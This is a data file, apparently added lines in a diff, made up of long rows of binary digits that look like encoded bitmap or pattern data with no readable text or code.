+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011011001001000010000000000000000010010110000000001110010000110111100110100010001110000000001000000110001100001111100000110111100101100000001110001000000000000110000000001101100000110111101101100000001110000000000000011111000000001100000000110100100000100000001110000000000000000000000000000000000000000000000000000000000000000000001001110001101101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000010000000000000000000000000000000100000000000000000000000000011000000000000000000000000001000100100000000000001000000000010000000000000000000001000000000100000000000000001000000000010000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111100101011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000101010000000110100000000001001000000000000000000000000010000100110000000110000100000001001000000000000000000000000010000000110000000110000000000001001000000000000000010000000010000000010000000110000000000001001000000000000000000000000000000000000000000000000000000000000000000001110100001110100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000010000000010000000000000000010000000000000010000000000100000010100000010100000000000000000000100100000010000000000100000010100010000001000000000000000000100000000010000000000100000010100010000001000000000000000001000000000010000000000100000001000000000001000000000000000000000000000000000000000000000000000000000000000000000000111101111010111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000011000000010010000000000000000000010000000000000000000000000000100001100000000110000000000001110000000000000000010000000000100111100010000110000000001001100000011000010000000000100000000111100010000110000100100101100000100010010000000000000000000001101101100110000000000001110000000000000000000000000000000000000000000000000000000000000000000000000001001100100001010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000100000000000000000000000000000000011000000000000000000000000001000000000000000000000000000001000000000000000000000000000001001000000000000000000000000001000000000000000000100000100001000100000000000000000000000000011000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000001100001100111111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101000000000000000000000000000000000000000000000000000000000000010000000000000000000100000000000000000000000000000100000000010000000000000100000100000000001000000000000000000100000000010000000000100000000100000001000000000000000000000000000000010000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000001111011000011111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000010000000000000000000000000000000000000000000000000000000000100000000000000100000000000000010000000000000000010000000100000100100010000100000000000000000000010000000000000100000000000100100010000100000000000000000000000000100000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101100000110000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000000000000100000000000000011000000000010001111000000001100000001111000000111100000001111000000000000011111000000111100000001111000000111100000001111000000000000001111000000111110010001111000000111100000001111000000000000000110000000000100000001111000000111100000000100000000000000000000000000000000000000000000000000000000000000000000001101000111001101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000001000000000000000010000000000011000000001000000000100000000001000000000000000100010000001000000000001000000000100000000001000000000000000100000000001000000000001000000000100000000001000000000000000000000000000010000000001000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000100111001100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000010000000001000000000010000000000000001000000000100000000000010000000001000000000010000000000000001001000000100000100000010000000001000000000010000000000000010000000000000000000000010000000001000000010000000000000000000000000000000000000000000000000000000000000000000000000001000011100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000100000000000000010000000000010010001000000000000000001010000000100100000001010000000000000000000000000100100000001010000000100100000001010000000000000100000000000100100100001010000000100100000001010000000000000000100000000000000000001010000000100100000000000000000000000000000000000000000000000000000000000000000000000000000000011100100010011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000011111101111010000000000000000000110111101000100000010001011110111101111010000000000010101010110111101000100000010001011110111101111010001000000000000000110111101000100000010001011110111101111010001000000000000000110111101000100000010001011110111111111110000000000000000000000000000000000000000000000000000000000000000000000000000001000100111010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011110010110110000000000000000000001011011000100000000001101101000010110110000000000011111111001011011000100000010001101101000010110110001000000000000000001011011000100000010001101101000010110110001000000000000000001011011000100000010001101101001111111110000000000000000000000000000000000000000000000000000000000000000000000000000000101111010110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000001111111110000000000000000000001011011001000000001001101101000010110110000000000000000000001011011001000000001001101101000010110110010000000011111111001011011001000000001001101101000010110110010000000000000000001011011000000000001001101101000010110110000000000000000000000000000000000000000000000000000000000000000000000000000100001011111110111111111111111111111111111111111111111111111111 